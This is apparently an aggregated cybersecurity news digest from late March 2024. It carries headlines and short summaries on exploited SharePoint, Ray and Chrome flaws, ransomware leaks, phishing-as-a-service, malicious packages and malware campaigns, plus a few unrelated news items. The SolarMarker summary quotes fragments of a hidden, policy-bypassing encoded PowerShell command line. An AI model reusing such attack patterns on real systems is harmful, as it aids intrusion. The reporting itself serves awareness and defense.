Autosummary: Researchers also recaptured nearly 200 different types of personally identifiable information (PII) in 2023, ranging from full names (3.16 billion) and phone numbers (2.14 billion) to dates of birth (920.25 million), social security and national ID numbers (171.61 million) and credit card numbers (36.97 million). Taking a deeper look into how stolen data empowers bad actors to perpetrate cybercrimes including account takeover, fraud, and ransomware, researchers analyzed the exposures of the average digital identity being traded in the criminal underground and found that the average identity appears in as many as nine breaches and is associated with 15 breach records. "


          Patch actively exploited Microsoft SharePoint bug, CISA orders federal agencies (CVE-2023-24955)

          exploits
          2024-03-28 https://www.helpnetsecurity.com/2024/03/28/cve-2023-24955-exploited/

          The Cybersecurity and Infrastructure Security Agency (CISA) has added CVE-2023-24955 – a code injection vulnerability that allows authenticated attackers to execute code remotely on a vulnerable Microsoft SharePoint Server – to its KEV catalog and is demanding that US federal civilian agencies implement the patch for it by April 16. As per usual, details about the attack in which the flaw is leveraged have not been shared. About CVE-2023-24955 and CVE-2023-29357 CVE-2023-24955 and CVE-2023-29357, a … More

          The post Patch actively exploited Microsoft SharePoint bug, CISA orders federal agencies (CVE-2023-24955) appeared first on Help Net Security.

          "



          Update Chrome now! Google patches possible drive-by vulnerability

          exploits
          2024-03-28 https://www.malwarebytes.com/blog/news/2024/03/update-chrome-now-google-patches-possible-drive-by-vulnerability
          Google has released an update for Chrome to fix seven security vulnerabilities. "

          Autosummary: Chromium vulnerabilities are considered critical if they “allow an attacker to read or write arbitrary resources (including but not limited to the file system, registry, network, etc.) on the underlying platform, with the user’s full privileges.” "


          Zero-day exploitation surged in 2023, Google finds

          exploits
          2024-03-28 https://www.helpnetsecurity.com/2024/03/28/zero-day-exploitation-2023/

2023 saw attackers increasingly focusing on the discovery and exploitation of zero-day vulnerabilities in third-party libraries (libvpx, ImageIO) and drivers (Mali GPU, Qualcomm Adreno GPU), as they can affect multiple products and effectively offer more possibilities for attack. Another interesting conclusion from Google’s recent rundown of the 97 zero-days exploited in-the-wild in 2023 is that there’s a notable increase in targeting enterprise-specific technologies. Number of zero-days exploited in the wild (2019-2023). Source: Google “This observed … More

          The post Zero-day exploitation surged in 2023, Google finds appeared first on Help Net Security.

          "

Autosummary: “This observed increase in enterprise targeting was fueled mainly by exploitation of security software and appliances, including, but not limited to, Barracuda Email Security Gateway, Cisco Adaptive Security Appliance, Ivanti Endpoint Manager Mobile and Sentry, and Trend Micro Apex One,” Google TAG’s and Mandiant’s threat analysts noted. "


          NHS Scotland confirms ransomware attackers leaked patients’ data

          exploits ransomware
          2024-03-28 https://www.helpnetsecurity.com/2024/03/28/nhs-scotland-ransomware/

          NHS Dumfries and Galloway (part of NHS Scotland) has confirmed that a “recognised ransomware group” was able to “access a significant amount of data including patient and staff-identifiable information,” and has published “clinical data relating to a small number of patients.” “NHS DG still holds the original files and they have not been altered or deleted. Some information has been copied and leaked. NHS DG will contact everyone whose information is known to have been … More

          The post NHS Scotland confirms ransomware attackers leaked patients’ data appeared first on Help Net Security.

          "

          Autosummary: On Tuesday, the group released a “proof pack” consisting of a handful of sensitive documents (reports, analysis results, and letters between patients and physicians), to incentivize the board to pay the ransom in exchange for keeping the stolen data under wraps. "


          Google: China dominates government exploitation of zero-day vulnerabilities in 2023

          exploits government
          2024-03-28 https://securityaffairs.com/161171/hacking/google-zero-day-vulnerabilities-2023.html
          Google’s Threat Analysis Group (TAG) and Mandiant reported a surge in the number of actively exploited zero-day vulnerabilities in 2023. Google’s Threat Analysis Group (TAG) and its subsidiary Mandiant reported that in 2023 97 zero-day vulnerabilities were exploited in attacks, while in 2022 the actively exploited zero-day flaws were 62. In 2023, Google (TAG) and […] "

          Autosummary: In 2023, the researchers observed 36 zero-day vulnerabilities exploited in the wild targeting enterprise-specific technologies, while 61 vulnerabilities affected end-user platforms and products such as mobile devices, operating systems, browsers, and other applications. "


          Argentina angers Colombia over "terrorist" jibe

          latam
          2024-03-28 https://www.bbc.co.uk/news/world-latin-america-68683688
          President Javier Milei calls his Colombian counterpart a "murdering terrorist", triggering diplomatic expulsions. "



          PyPI suspends new user registration to block malware campaign

          exploits
          2024-03-28 https://www.bleepingcomputer.com/news/security/pypi-suspends-new-user-registration-to-block-malware-campaign/
          The Python Package Index (PyPI) has temporarily suspended user registration and the creation of new projects to deal with an ongoing malware campaign. [...] "

          Autosummary: Info-stealer payload (Checkmarx) Checkmarx makes available in its report the full list of malicious entries they found, which contains numerous typosquatting variants for many legitimate packages. "


          Facebook spied on Snapchat users to get analytics about the competition

          industry
          2024-03-28 https://www.malwarebytes.com/blog/news/2024/03/facebook-spied-on-snapchat-users-to-get-analytics-about-the-competition
          Facebook is accused of using potentially criminal methods to spy on Snapchat users to gain a commercial advantage over its competition. "

          Autosummary: “Whenever someone asks a question about Snapchat, the answer is usually that because their traffic is encrypted we have no analytics about them. . . . "


          Sellafield nuclear waste dump faces prosecution over cybersecurity failures

          ciber
          2024-03-28 https://www.bitdefender.com/blog/hotforsecurity/sellafield-nuclear-waste-dump-faces-prosecution-over-cybersecurity-failures/
The UK’s Office for Nuclear Regulation (ONR) has started legal action against the controversial Sellafield nuclear waste facility due to years of alleged cybersecurity breaches. Read more in my article on the Hot for Security blog. "

          Autosummary: The Guardian, which initially brought attention to the claims, said that it was still not known if the malware infection had been eradicated, and that the Sellafield site had been put in "special measures" due to its consistent cybersecurity breaches and failure to report incidents. "


          Linux Version of DinodasRAT Spotted in Cyber Attacks Across Several Countries

          Linux
          2024-03-28 https://thehackernews.com/2024/03/linux-version-of-dinodasrat-spotted-in.html
          A Linux version of a multi-platform backdoor called DinodasRAT has been detected in the wild targeting China, Taiwan, Turkey, and Uzbekistan, new findings from Kaspersky reveal. DinodasRAT, also known as XDealer, is a C++-based malware that offers the ability to harvest a wide range of sensitive data from compromised hosts. In October 2023, Slovak cybersecurity firm ESET  "



          Darcula Phishing Network Leveraging RCS and iMessage to Evade Detection

          financial
          2024-03-28 https://thehackernews.com/2024/03/darcula-phishing-network-leveraging-rcs.html
          A sophisticated phishing-as-a-service (PhaaS) platform called Darcula has set its sights on organizations in over 100 countries by leveraging a massive network of more than 20,000 counterfeit domains to help cyber criminals launch attacks at scale. "Using iMessage and RCS rather than SMS to send text messages has the side effect of bypassing SMS firewalls, which is being used to great "

Autosummary: "While end-to-end encryption in RCS and iMessage delivers valuable privacy for end users, it also allows criminals to evade filtering required by this legislation by making the content of messages impossible for network operators to examine, leaving Google and Apple’s on-device spam detection and third-party spam filter apps as the primary line of defense preventing these messages from reaching victims," Netcraft added. A majority of the templates are designed to mimic postal services, but they also include public and private utilities, financial institutions, government bodies (e.g., tax departments), airlines, and telecommunication organizations. "


          "Crypto King" Sam Bankman-Fried sentenced to 25 years in prison

          financial
          2024-03-28 https://www.bbc.co.uk/news/live/world-us-canada-68656415
          The former billionaire has been sentenced for massive fraud and money laundering. "



          Decade-old Linux ‘wall’ bug helps make fake SUDO prompts, steal passwords

          exploits Linux
          2024-03-28 https://www.bleepingcomputer.com/news/security/decade-old-linux-wall-bug-helps-make-fake-sudo-prompts-steal-passwords/
A vulnerability has been discovered in the "util-linux" library that could allow unprivileged users to put arbitrary text on other users’ terminals using the "wall" command. [...] "

Autosummary: "Since we can send escape sequences through wall, if a user is using a terminal that supports this escape sequence, an attacker can change the victim’s clipboard to arbitrary text," Ferrante details. "


          Stopping a K-12 cyberattack (SolarMarker) with ThreatDown MDR

          ciber
          2024-03-28 https://www.malwarebytes.com/blog/business/2024/03/stopping-a-k-12-cyberattack-solarmarker-with-threatdown-mdr
          How experts uncovered a years-long SolarMarker attack on a K-12 district "

Autosummary: The command line shows signs of the malicious script execution, with parameters indicative of a desire to hide the window (-WindowStyle Hidden), bypass execution policies (-Ep ByPass), and run encoded commands (-ComMand “sa43…). "


FTX’s Sam Bankman-Fried sentenced to 25 years

          financial
          2024-03-28 https://www.bbc.co.uk/news/business-68677487
          The crypto exchange co-founder was convicted last year of stealing $8bn from investors. "



          Cybercriminals play dirty: A look back at 10 cyber hits on the sporting world

          ciber
          2024-03-28 https://www.welivesecurity.com/en/cybercrime/cybercriminals-play-dirty-10-cyber-hits-sporting-world/
          This rundown of 10 cyberattacks against the sports industry shows why every team needs to keep its eyes on the ball when it comes to cybersecurity "

          Autosummary: This incident compromised servers storing sensitive data, including names, surnames, postal addresses, email addresses, telephone numbers, and even bank account details of subscribers and shareholders. The breach impacted a variety of victims, including parents of junior players, international players, professionals from 2016-2018, contacts of the KNVB Sports Medical Center, and individuals involved in the organization’s disciplinary matters from 1999-2020. The team acknowledged the attack, lamenting the exfiltration of 32 GB of sensitive data, including player information such as passports and identity documents, contracts, confidentiality agreements, and other legal documentation. This attack had severe implications for one of the NBA’s most prominent teams, with the attackers claiming responsibility for leaking over 500 GB of confidential information, including sensitive data such as player contracts, customer records, and financial details. The attack, variously attributed to Sandworm and Fancy Bear APT groups, primarily targeted the event’s official website, the servers of ski resorts hosting the Olympic contests, and two IT service providers who managed the event’s technical infrastructure. "


          Cybersecurity jobs available right now: March 27, 2024

          ciber
          2024-03-27 https://www.helpnetsecurity.com/2024/03/27/cybersecurity-jobs-available-right-now-march-27-2024/

          Cyber Product Owner UBS | Israel | On-site – View job details Your primary responsibilities will include owning and managing application security testing products, collaborating with the cyber hygiene operational team, and understanding their needs. You will also engage with the application development community to comprehend their requirements for application security testing. Cybersecurity Engineer AKUR8 | France | Hybrid – View job details AKUR8 seeks a cybersecurity engineer to help improve security posture and manage … More

          The post Cybersecurity jobs available right now: March 27, 2024 appeared first on Help Net Security.

          "

          Autosummary: Cyber Security and Compliance Lead Carrier | Portugal | On-site – View job details The position serves as the process owner of all assurance activities related to the availability, integrity, and confidentiality of customers, business partners, employees, and business information in compliance with the organization’s information security policies. Cyber Security Assurance Analyst Stryker | Costa Rica | Hybrid – View job details You will be responsible for assessing, analyzing, and evaluating security controls, policies, and procedures to identify vulnerabilities and risks, as well as providing recommendations for remediation and continuous improvement. "


          Cybersecurity essentials during M&A surge

          ciber
          2024-03-27 https://www.helpnetsecurity.com/2024/03/27/ma-success-methods-video/

          The volume of mergers and acquisitions has surged significantly this quarter. Data from Dealogic shows a 130% increase in US M&A activity, totaling $288 billion. Worldwide M&A has also seen a substantial uptick, rising by 56% to $453 billion. Considering the rise in M&A transactions, cybersecurity considerations have become more pressing than ever. Integrating disparate IT systems and data repositories during mergers and acquisitions opens organizations up to potential vulnerabilities that pose significant risks to … More

          The post Cybersecurity essentials during M&A surge appeared first on Help Net Security.

          "



          Trezor’s Twitter account hijacked by cryptocurrency scammers via bogus Calendly invite

          financial
          2024-03-27 https://www.bitdefender.com/blog/hotforsecurity/trezors-twitter-account-hijacked-by-cryptocurrency-scammers-via-bogus-calendly-invite/
          Hardware wallet manufacturer Trezor has explained how its Twitter account was compromised - despite it having sensible security precautions in place, such as strong passwords and multi-factor authentication. Read more in my article on the Hot for Security blog. "

          Autosummary: According to Trezor, someone posing as "a credible entity from the crypto space", using a Twitter account with thousands of followers, approached its PR team on February 29, 2024. In a subsequent blog post, Trezor explained how its Twitter account had been compromised - despite the firm having sensible security precautions in place, such as strong passwords and multi-factor authentication. "


          Malwarebytes adds AI functionality to ThreatDown Security Advisor

          exploits
          2024-03-27 https://www.helpnetsecurity.com/2024/03/27/malwarebytes-threatdown-security-advisor/

          Malwarebytes has added AI functionality to its Security Advisor, available in every ThreatDown Bundle. Leveraging generative AI technology, the new capabilities will transform Security Advisor into a dynamic experience that allows customers to use simple natural language requests to search for information about their environment, ask for recommendations on how to optimize their security posture, automatically implement updates, and more. This will allow customers to quickly mitigate threats, reduce risk, and boost efficiency. “As we … More

          The post Malwarebytes adds AI functionality to ThreatDown Security Advisor appeared first on Help Net Security.

          "

          Autosummary: Leveraging generative AI technology, the new capabilities will transform Security Advisor into a dynamic experience that allows customers to use simple natural language requests to search for information about their environment, ask for recommendations on how to optimize their security posture, automatically implement updates, and more. "


          Attackers leverage weaponized iMessages, new phishing-as-a-service platform

          financial
          2024-03-27 https://www.helpnetsecurity.com/2024/03/27/phishing-imessages-google-messages/

          Scammers are leveraging the Darcula phishing-as-a-service platform, iMessages and Google Messages to great effect. The platform allows them to impersonate a variety of brands based in over 100 different countries: postal services, public and private utilities, packet delivery services, financial institutions, government bodies, airlines, and telcos. What’s unusual about this platform? “Darcula is cat-themed, with a cat as its Telegram channel image, the administration panel previously being labeled with a cat image, and infrastructure domains … More

          The post Attackers leverage weaponized iMessages, new phishing-as-a-service platform appeared first on Help Net Security.

          "

Autosummary: Other interesting aspects of the platform are its use of JavaScript, React, Docker, and Harbor, and its capability to update phishing sites with new features and anti-detection measures without having to remove and re-install the phishing kit. “The Darcula platform has been used for numerous high-profile phishing attacks over the last year, including messages received on both Apple and Android devices in the UK, as well as package scams impersonating United States Postal Service (USPS) highlighted in numerous posts on [Reddit’s subreddit about phishing],” the researchers noted. "


          Critical Unpatched Ray AI Platform Vulnerability Exploited for Cryptocurrency Mining

          exploits
          2024-03-27 https://thehackernews.com/2024/03/critical-unpatched-ray-ai-platform.html
Cybersecurity researchers are warning that threat actors are actively exploiting a "disputed" and unpatched vulnerability in an open-source artificial intelligence (AI) platform called Anyscale Ray to hijack computing power for illicit cryptocurrency mining. "This vulnerability allows attackers to take over the companies’ computing power and leak sensitive data," Oligo Security researchers Avi "

          Autosummary: This includes production database passwords, private SSH keys, access tokens related to OpenAI, HuggingFace, Slack, and Stripe, the ability to poison models, and elevated access to cloud environments from Amazon Web Services, Google Cloud, and Microsoft Azure. "


          Alert: New Phishing Attack Delivers Keylogger Disguised as Bank Payment Notice

          financial
          2024-03-27 https://thehackernews.com/2024/03/alert-new-phishing-attack-delivers.html
          A new phishing campaign has been observed leveraging a novel loader malware to deliver an information stealer and keylogger called Agent Tesla. Trustwave SpiderLabs said it identified a phishing email bearing this attack chain on March 8, 2024. The message masquerades as a bank payment notification, urging the user to open an archive file attachment. The archive ("Bank Handlowy w Warszawie "

          Autosummary: " Tycoon, publicly documented by Trustwave last month, permits cyber criminals to target users of Microsoft 365 with phony login pages to capture their credentials, session cookies, and two-factor authentication (2FA) codes. "


          KuCoin charged with AML violations that let cybercriminals launder billions

          ciber
          2024-03-27 https://www.bleepingcomputer.com/news/cryptocurrency/kucoin-charged-with-aml-violations-that-let-cybercriminals-launder-billions/
          The U.S. Department of Justice (DoJ) has charged global cryptocurrency exchange KuCoin and two of its founders for failing to adhere to anti-money laundering (AML) requirements, allowing threat actors to use the platform to launder money. [...] "



          Ransomware as a Service and the Strange Economics of the Dark Web

          exploits industry
          2024-03-27 https://www.bleepingcomputer.com/news/security/ransomware-as-a-service-and-the-strange-economics-of-the-dark-web/
          Ransomware is quickly changing in 2024, with massive disruptions and large gangs shutting down. Learn from Flare how affiliate competition is changing in 2024, and what might come next. [...] "

Autosummary: As the cybercrime ecosystem has grown, it’s also grown more complex, with many different actors carrying out individual legs of a complex supply chain. This has led to a highly competitive ecosystem, in which the largest ransomware groups try to offer potential affiliates a larger share of successful ransoms and fewer restrictions than other groups, as a play to win the most sophisticated affiliates. (Image: LockBit’s Affiliate Rules page) Giving affiliates the hard work of executing successful attacks allows the groups to scale much faster and compromise many more victims than would otherwise be possible, while also enabling the groups to continue to innovate on their ransomware code. "


          Google: Spyware vendors behind 50% of zero-days exploited in 2023

          exploits
          2024-03-27 https://www.bleepingcomputer.com/news/security/google-spyware-vendors-behind-50-percent-of-zero-days-exploited-in-2023/
Google’s Threat Analysis Group (TAG) and Google subsidiary Mandiant said they’ve observed a significant increase in the number of zero-day vulnerabilities exploited in attacks in 2023, many of them linked to spyware vendors and their clients. [...] "

Autosummary: (Image: Zero-days exploited in attacks since 2019, Google) In 2023, commercial surveillance vendors (CSVs) were behind most zero-day exploits targeting Google products and Android ecosystem devices. "


          AI framework vulnerability is being used to compromise enterprise servers (CVE-2023-48022)

          exploits
          2024-03-27 https://www.helpnetsecurity.com/2024/03/27/cve-2023-48022/

          Attackers are leveraging a vulnerability (CVE-2023-48022) in Anyscale’s Ray AI software to compromise enterprise servers and saddle them with cryptominers and reverse shells. “To our knowledge, the attack started 7 months ago,” Avi Lumelsky, a researcher at Oligo Security, told Help Net Security. “We observed hundreds of compromised clusters in the past three weeks alone. Each cluster uses a public IP address, and most clusters contain hundreds to thousands of servers. There are hundreds of … More

          The post AI framework vulnerability is being used to compromise enterprise servers (CVE-2023-48022) appeared first on Help Net Security.


          Autosummary: The compromised machines included a wealth of sensitive information, including: OpenAI tokens (which can be used to access OpenAI accounts); Stripe tokens (which can be used to drain Stripe payment accounts); HuggingFace tokens (which may allow attackers to access private repositories and tamper with ML models); Slack tokens (which attackers may use to read an affected organization's Slack messages or send messages); production DB credentials (allowing attackers to download or modify databases); and more.


          CISA Warns: Hackers Actively Attacking Microsoft SharePoint Vulnerability

          exploits
          2024-03-27 https://thehackernews.com/2024/03/cisa-warns-hackers-actively-attacking.html
          The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a security flaw impacting the Microsoft SharePoint Server to its Known Exploited Vulnerabilities (KEV) catalog based on evidence of active exploitation in the wild. The vulnerability, tracked as CVE-2023-24955 (CVSS score: 7.2), is a critical remote code execution flaw that allows an authenticated attacker with



          Microsoft Edge Bug Could Have Allowed Attackers to Silently Install Malicious Extensions

          exploits
          2024-03-27 https://thehackernews.com/2024/03/microsoft-edge-bug-could-have-allowed.html
          A now-patched security flaw in the Microsoft Edge web browser could have been abused to install arbitrary extensions on users' systems and carry out malicious actions. "This flaw could have allowed an attacker to exploit a private API, initially intended for marketing purposes, to covertly install additional browser extensions with broad permissions without the user's knowledge," Guardio

          Autosummary: One such API in the Chromium-based Edge browser is edgeMarketingPagePrivate, which is accessible from a set of allowlisted websites that belong to Microsoft, including bing[.]com, microsoft[.]com, microsoftedgewelcome.microsoft[.]com, and microsoftedgetips.microsoft[.]com, among others.


          Google fixes Chrome zero-days exploited at Pwn2Own 2024

          exploits
          2024-03-27 https://www.bleepingcomputer.com/news/security/google-fixes-chrome-zero-days-exploited-at-pwn2own-2024/
          Google fixed seven security vulnerabilities in the Chrome web browser on Tuesday, including two zero-days exploited during the Pwn2Own Vancouver 2024 hacking competition. [...]



          CISA tags Microsoft SharePoint RCE bug as actively exploited

          exploits
          2024-03-27 https://www.bleepingcomputer.com/news/security/cisa-tags-microsoft-sharepoint-rce-bug-as-actively-exploited/
          CISA warns that attackers are now exploiting a Microsoft SharePoint code injection vulnerability that can be chained with a critical privilege escalation flaw for pre-auth remote code execution attacks. [...]



          Ransomware hits The Big Issue. Qilin group leaks confidential data

          exploits
          2024-03-27 https://www.bitdefender.com/blog/hotforsecurity/ransomware-hits-the-big-issue-qilin-group-leaks-confidential-data/
          The Qilin ransomware group has targeted The Big Issue, a street newspaper sold by the homeless and vulnerable. A post on Qilin's dark web leak site claimed the gang has stolen 550 GB of confidential data from the periodical's parent company. Read more in my article on the Hot for Security blog.



          Hackers Hit Indian Defense, Energy Sectors with Malware Posing as Air Force Invite

          exploits industry
          2024-03-27 https://thehackernews.com/2024/03/hackers-target-indian-defense-and.html
          Indian government entities and energy companies have been targeted by unknown threat actors with an aim to deliver a modified version of an open-source information stealer malware called HackBrowserData and exfiltrate sensitive information, in some cases by using Slack as command-and-control (C2). "The information stealer was delivered via a phishing email, masquerading as an invitation letter

          Autosummary: The attack chain starts with a phishing message containing an ISO file ("invite.iso"), which, in turn, contains a Windows shortcut (LNK) that triggers the execution of a hidden binary ("scholar.exe") present within the mounted optical disk image.


          CISA adds Microsoft SharePoint bug disclosed at Pwn2Own to its Known Exploited Vulnerabilities catalog

          exploits
          2024-03-27 https://securityaffairs.com/161134/security/cisa-microsoft-sharepoint-known-exploited-vulnerabilities-catalog.html
          U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds a Microsoft SharePoint vulnerability disclosed at the 2023 Pwn2Own to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the CVE-2023-24955 Microsoft SharePoint Server Code Injection Vulnerability to its Known Exploited Vulnerabilities (KEV) catalog. Microsoft addressed the remote code execution flaw in SharePoint Server, […]



          New Darcula phishing service targets iPhone users via iMessage

          financial
          2024-03-27 https://www.bleepingcomputer.com/news/security/new-darcula-phishing-service-targets-iphone-users-via-imessage/
          A new phishing-as-a-service (PhaaS) named "Darcula" uses 20,000 domains to spoof brands and steal credentials from Android and iPhone users in more than 100 countries. [...]

          Autosummary: Darcula has been used against a wide range of services and organizations, from postal, financial, government and taxation departments to telcos, airlines and utilities, offering fraudsters over 200 templates to choose from.


          Reinforcement learning is the path forward for AI integration into cybersecurity

          ciber
          2024-03-26 https://www.helpnetsecurity.com/2024/03/26/ai-reinforcement-learning/

          AI’s algorithms and machine learning can cull through immense volumes of data efficiently and in a relatively short amount of time. This is instrumental to helping network defenders sift through a never-ending supply of alerts and identify those that pose a possible threat (instead of false positives). Reinforcement learning underpins the benefit of AI to the cybersecurity ecosystem and is closest to how humans learn through experience and trial and error. Unlike supervised learning, reinforcement … More

          The post Reinforcement learning is the path forward for AI integration into cybersecurity appeared first on Help Net Security.


          Autosummary: Reinforcement learning use cases: one use case of reinforcement learning is network monitoring, where an agent can detect network intrusions by observing traffic patterns and applying lessons learned to raise an alert. How reinforcement learning can help: alert fatigue for security operations center (SOC) analysts has become a legitimate business concern for chief information security officers, who are concerned about analyst burnout and employee turnover as a result.


          Strengthening critical infrastructure cybersecurity is a balancing act

          ciber
          2024-03-26 https://www.helpnetsecurity.com/2024/03/26/aaron-crow-morganfranklin-consulting-critical-infrastructure-cybersecurity/

          In this Help Net Security interview, Aaron Crow, Senior Director at MorganFranklin Consulting, discusses critical infrastructure cybersecurity strategies, barriers to threat information sharing, and innovative technologies enhancing resilience against cyberattacks. How do current cybersecurity strategies address the critical infrastructure sectors’ unique needs and vulnerabilities? Some current cybersecurity strategies such as protocol isolation, network segmentation and visibility certainly help to address some of the ‘low-hanging fruit’ and visibility allows the sectors to have a good idea … More

          The post Strengthening critical infrastructure cybersecurity is a balancing act appeared first on Help Net Security.


          Autosummary: These controls, such as regular patch management, access controls, and network segmentation, address common vulnerabilities and reduce the attack surface, making it harder for adversaries to exploit weaknesses within the technology ecosystem, and have historically proven ROI. Additionally, these solutions integrate multi-factor authentication, user-to-asset access controls, user session analytics, and automatic video recording.


          Scammers exploit tax season anxiety with AI tools

          financial exploits
          2024-03-26 https://www.helpnetsecurity.com/2024/03/26/online-tax-scams-concerns/

          25% of Americans have lost money to online tax scams, according to McAfee. Of the people who clicked on fraudulent links from supposed tax services, 68% lost money. Among those, 29% lost more than $2,500, and 17% lost more than $10,000. Moreover, 76% lost money after clicking links in cryptocurrency tax-related messages, with 26% losing more than $2,500 and 16% losing more than $10,000. Cybercriminals embrace AI tools for attacks: McAfee's research points to the … More

          The post Scammers exploit tax season anxiety with AI tools appeared first on Help Net Security.


          Autosummary: “We urge people to balance convenience with caution, practice good cyber hygiene, and use the latest in AI-powered online protection to keep their privacy, identity, and personal information safe to help ensure a scam-free tax season,” continued Grobman.


          Tech industry’s focus on innovation leaves security behind

          industry
          2024-03-26 https://www.helpnetsecurity.com/2024/03/26/technology-companies-cyber-threats/

          The rapid digital transformation and technological progress within the technology sector have enlarged the attack surface for companies operating in this space, according to Trustwave. As the sector evolves, the proliferation of Software-as-a-Service (SaaS) providers, cloud infrastructure, and internet-connected systems and devices continues to grow. This growth often occurs at a rate that outstrips the deployment of adequate security measures, for example the inability to keep track of and remediate vulnerabilities, which exposes the company … More

          The post Tech industry’s focus on innovation leaves security behind appeared first on Help Net Security.


          Autosummary: Even a minor security breach can cripple a company and cause cascading disruptions across the vital systems we rely on, including internal business operations, customer-trusted software and products, and the infrastructure supporting supply chains.


          CISA Alerts on Active Exploitation of Flaws in Fortinet, Ivanti, and Nice Products

          exploits
          2024-03-26 https://thehackernews.com/2024/03/cisa-alerts-on-active-exploitation-of.html
          The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Monday added three security flaws to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation. The vulnerabilities added are as follows: CVE-2023-48788 (CVSS score: 9.3), Fortinet FortiClient EMS SQL Injection Vulnerability; CVE-2021-44529 (CVSS score: 9.8), Ivanti

          Autosummary: The vulnerabilities added are as follows: CVE-2023-48788 (CVSS score: 9.3), Fortinet FortiClient EMS SQL Injection Vulnerability; CVE-2021-44529 (CVSS score: 9.8),


          Watch ‘devils’ whip Catholics in Easter tradition

          industry
          2024-03-26 https://www.bbc.co.uk/news/world-latin-america-68662739
          Men dressed as devils - "talciguines" - whip the faithful in a playful Easter tradition in El Salvador.



          Brazil's Barbosa banned for anti-doping fraud attempt

          latam
          2024-03-26 https://www.bbc.co.uk/sport/football/68663171
          Flamengo and Brazil striker Gabriel Barbosa is suspended for two years for attempted anti-doping fraud.

          Autosummary: "I have never attempted to obstruct or defraud any test, and I trust that I will be cleared by the higher court," he said in a post on X. "Since the beginning of my career as a footballer, I have always followed the rules of the game and never used banned substances.


          GitGuardian SCA automates vulnerability detection and prioritization for enhanced code health

          exploits
          2024-03-26 https://www.helpnetsecurity.com/2024/03/26/gitguardian-software-composition-analysis-sca/

          GitGuardian has released its Software Composition Analysis (SCA) module. SCA directly impacts the health of organizations’ codebase by automating vulnerability detection, prioritization, and remediation in software dependencies. Its additional capabilities ensure code licensing and regulatory compliance, such as generating comprehensive SBOM (Software Bill of Materials). Open-source software has transformed software development, providing developers access to a vast pool of reusable components. However, open-source dependencies can be a significant security liability for organizations, as developers often … More

          The post GitGuardian SCA automates vulnerability detection and prioritization for enhanced code health appeared first on Help Net Security.


          Autosummary: GitGuardian’s product suite addresses this gap by integrating a range of security tools, including Secrets Detection, Public Monitoring, Software Composition Analysis, Infra as Code Security, and Honeytoken. The latest addition to GitGuardian’s code security platform equips security and developer teams with a unified vulnerability remediation solution, capitalizing on cross-team collaboration, incident visibility, and context.


          DataVisor’s AML solution helps combat sophisticated financial crimes

          financial
          2024-03-26 https://www.helpnetsecurity.com/2024/03/26/datavisor-aml-solution/

          DataVisor announced its latest offering: an end-to-end anti-money laundering (AML) solution boasting technology and comprehensive functionalities powered by machine learning and AI. Amidst increasing regulatory compliance requirements and the growing complexity of financial crime tactics, this essential solution stands out for its ability to cover the entire AML workflow, while fitting seamlessly into customers’ current workflows. The solution integrates with DataVisor’s AI-powered fraud platform natively, offering a unified fraud and anti-money laundering (FRAML) approach. This … More

          The post DataVisor’s AML solution helps combat sophisticated financial crimes appeared first on Help Net Security.


          Autosummary: DataVisor’s AML solution features the following benefits: Comprehensive end-to-end solution: end-to-end functionality includes customer risk rating, CDD/EDD, sanction/watchlist screening, transaction monitoring, case management, and automated SAR filing, ensuring streamlined AML processes and full regulatory compliance.


          Hackers exploit Ray framework flaw to breach servers, hijack resources

          exploits
          2024-03-26 https://www.bleepingcomputer.com/news/security/hackers-exploit-ray-framework-flaw-to-breach-servers-hijack-resources/
          A new hacking campaign dubbed "ShadowRay" targets an unpatched vulnerability in Ray, a popular open-source AI framework, to hijack computing power and leak sensitive data from thousands of companies. [...]

          Autosummary: The framework boasts over 30,500 stars on GitHub, and it is used by many organizations worldwide, including Amazon, Spotify, LinkedIn, Instacart, Netflix, Uber, and OpenAI, which uses it to train ChatGPT.


          TheMoon malware infects 6,000 ASUS routers in 72 hours for proxy service

          exploits
          2024-03-26 https://www.bleepingcomputer.com/news/security/themoon-malware-infects-6-000-asus-routers-in-72-hours-for-proxy-service/
          A new variant of "TheMoon" malware botnet has been spotted infecting thousands of outdated small office and home office (SOHO) routers and IoT devices in 88 countries. [...]

          Autosummary: Once the malware gains access to a device, it checks for the presence of specific shell environments ("/bin/bash," "/bin/ash," or "/bin/sh"); otherwise, it stops execution.


          Malicious NuGet Package Linked to Industrial Espionage Targets Developers

          industry
          2024-03-26 https://thehackernews.com/2024/03/malicious-nuget-package-linked-to.html
          Threat hunters have identified a suspicious package in the NuGet package manager that's likely designed to target developers working with tools made by a Chinese firm that specializes in industrial and digital equipment manufacturing. The package in question is SqzrFramework480, which ReversingLabs said was first published on January 24, 2024. It has been downloaded

          Autosummary: Present within the library is a DLL file "SqzrFramework480.dll" that comes with features to take screenshots, ping a remote IP address every 30 seconds until the operation is successful, and transmit the screenshots over a socket created and connected to said IP address.


          Borrower beware: Common loan scams and how to avoid them

          financial
          2024-03-26 https://www.welivesecurity.com/en/scams/borrower-beware-common-loan-scams/
          Personal loan scams prey on your financial vulnerability and might even trap you in a vicious circle of debt. Here’s how to avoid being scammed when considering a loan.

          Autosummary: How to stay safe from loan fraud. Look out for the following red flags to stay safe:
          - Guaranteed approval of a loan
          - Request for upfront payment of a fee
          - Unsolicited contact by the loan company
          - Pressure tactics and a sense of urgency, which are a supremely popular trick among scammers of various kinds
          - A sender email address or website domain that doesn’t match the company name
          - No fine print to check on the loan itself
          Also consider the following precautionary steps:
          - Research the company purporting to offer the loan
          - Never pay an upfront fee unless the company sends an official notice setting out the terms of the loan and reasons for the extra charge (which you have to agree to in writing)
          - Always use anti-malware on your computer and multi-factor authentication (MFA) to reduce the chances of data theft
          - Don’t reply directly to unsolicited emails
          - Don’t overshare online – scammers may be scanning social media for any opportunities to prey on your financial situation
          - Only download apps from official Google/Apple app stores
          - Ensure your mobile device is protected with security software from a reputable vendor
          - Don’t download apps that ask for excessive permissions
          - Read user reviews before downloading any app
          - Report suspected scams to the appropriate authorities, such as the Federal Trade Commission (FTC) or Consumer Financial Protection Bureau (CFPB)
